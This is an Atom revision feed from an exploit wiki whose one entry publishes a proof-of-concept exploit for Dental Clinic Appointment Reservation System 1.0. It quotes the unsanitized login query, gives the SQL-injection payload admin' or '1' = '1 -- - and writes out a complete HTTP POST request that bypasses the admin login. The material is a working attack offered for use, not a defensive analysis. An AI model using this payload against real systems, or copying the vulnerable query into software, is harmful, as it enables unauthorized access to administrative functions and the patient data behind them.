<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Dental_Clinic_Appointment_Reservation_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E</id>
	<title>Dental Clinic Appointment Reservation System 1.0 身份驗證繞過漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Dental_Clinic_Appointment_Reservation_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Dental_Clinic_Appointment_Reservation_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T04:12:41Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Dental_Clinic_Appointment_Reservation_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=2844&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi) # Date: 12.05.2021 # Exploit Author: Mesut Cetin # Vendor Homepa...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Dental_Clinic_Appointment_Reservation_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=2844&amp;oldid=prev"/>
		<updated>2021-05-13T09:24:48Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi) # Date: 12.05.2021 # Exploit Author: Mesut Cetin # Vendor Homepa...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)&lt;br /&gt;
# Date: 12.05.2021&lt;br /&gt;
# Exploit Author: Mesut Cetin&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&amp;amp;title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: Ubuntu 18.04 TLS&lt;br /&gt;
&lt;br /&gt;
# Description:&lt;br /&gt;
# Attacker can bypass admin login page due to unsanitized user input and access internal contents&lt;br /&gt;
# vulnerable code in /admin/index.php, line 34:&lt;br /&gt;
$query = &amp;quot;SELECT * FROM users WHERE username='$username' AND password='$password'&amp;quot;;&lt;br /&gt;
# payload: admin' or '1' = '1 -- -&lt;br /&gt;
&lt;br /&gt;
# Proof of concept:&lt;br /&gt;
http://localhost/admin/index.php&lt;br /&gt;
&lt;br /&gt;
POST /admin/index.php HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
Content-Length: 54&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
Origin: http://localhost&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; E6653 Build/32.2.A.0.253) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
Referer: http://localhost/admin/index.php&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: en-US,en;q=0.9&lt;br /&gt;
Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p&lt;br /&gt;
dnt: 1&lt;br /&gt;
sec-gpc: 1&lt;br /&gt;
Connection: close&lt;br /&gt;
&lt;br /&gt;
username=admin'+or+'1'%3d1+--+-&amp;amp;password=test&amp;amp;submit=&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>